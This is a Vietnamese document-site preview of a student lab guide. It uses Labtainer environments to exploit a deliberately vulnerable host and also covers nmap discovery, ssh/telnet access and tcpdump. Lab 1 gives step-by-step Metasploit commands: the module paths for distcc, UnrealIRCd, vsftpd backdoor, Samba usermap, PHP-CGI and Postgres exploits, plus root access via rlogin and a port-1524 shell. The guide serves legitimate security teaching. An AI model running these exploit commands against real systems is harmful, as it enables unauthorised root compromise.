1. Trang chủ
  2. » Giáo Dục - Đào Tạo

Bài 1 khai thác lỗ hổng dịch vụ sử dụng metasploit

12 1 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Exploiting Service Vulnerabilities Using Metasploit
Định dạng
Số trang 12
Dung lượng 6,42 MB

Nội dung

Bài 1: Khai thác lỗ hổng dịch vụ sử dụng MetasploitBước 1: labtainer -r metasploit Bước 2: ifconfig... - Trên terminal gõ: “sudo msfconsole”- Tìm và tấn công dịch vụ distccd: search dis

Trang 1

Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit

Bước 1: labtainer -r metasploit

Bước 2: ifconfig

Trang 2

Bước 3: Kiểm tra kết nối bằng ping

Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2

Trang 3

Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2

cat /root/filetoview.txt

Bước 6: Khai thác cổng dịch vụ 1524: telnet 192.168.1.2 1524 -> cat /root/filetoview.txt

Bước 7: Khai thác dịch vụ distccd (cổng 3632) sử dụng Metasploit:

Trang 4

- Trên terminal gõ: “sudo msfconsole”

- Tìm và tấn công dịch vụ distccd: search distccd

- Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec

Trang 5

- Xem cấu hình liên quan đến exploit: options

- Đặt RHOST: set RHOST 192.168.1.2

Trang 6

- Khai thác lỗ hổng: exploit

- Đọc file : cat /root/filetoview.txt

Trang 7

Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương tự

“sudo msfconsole” -> search unreal_ircd ->

use exploit/unix/irc/unreal_ircd_3281_backdoor

->set RHOST 192.168.1.2->exploit

->cat /root/filetoview.txt

Bước 9: Khai thác dịch vụ VSFtpd (cổng 21):

“sudo msfconsole” -> search vsftpd_234->

use exploit/unix/ftp/vsftpd_234_backdoor

->set RHOST 192.168.1.2->exploit

->cat /root/filetoview.txt

Bước 10: Khai thác dịch vụ Samba service (cổng 139):

“sudo msfconsole” -> search usermap_script->

use exploit/multi/samba/usermap_script

->set RHOST 192.168.1.2->exploit

->cat /root/filetoview.txt

Bước 11: Khai thác dịch vụ HTTP (cổng 80):

“sudo msfconsole” -> search php_cgi->

use exploit/multi/http/php_cgi_arg_injection

->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt

Bước 12: Khai thác dịch vụ Postgres (cổng 5432):

Trang 8

“sudo msfconsole” -> search postgres_payload

->use exploit/linux/postgres/postgres_payload

->set RHOST 192.168.1.2->exploit

->cat /root/filetoview.txt

Bước 13: Kết thúc bài lab: stoplab metasploit

Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quét

Bước 1: Xác định IP của máy

Bước 2: Trên máy khách mycomputer sử dụng nmap để tìm ra địa chỉ IP của

Trang 9

nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port)

nằm từ 2000-3000

Bước 3: Sau khi xác định được cổng ssh đang mở Sử dụng ssh để truy cập vào

máy chủ Tên máy chủ và mật khẩu là: ubuntu

Trang 10

Bước 4: Sau khi truy cập được vào máy chủ friedshrimp đi tìm file

friedshrimp.txt Mở và đọc file

Bước 5: Kết thúc bài lab: stoplab nmap-discovery

Bài 9: Sử dụng công cụ truy cập từ xa

Trang 11

Bước 1: Xác định IP của các máy

Bước 2: Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP

Bước 3: Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn

chứa đoạn mật mã

Trang 12

Bước 4: Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ

Bước 5: Kết thúc bài lab: stoplab telnetlab

Ngày đăng: 10/04/2024, 10:12

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w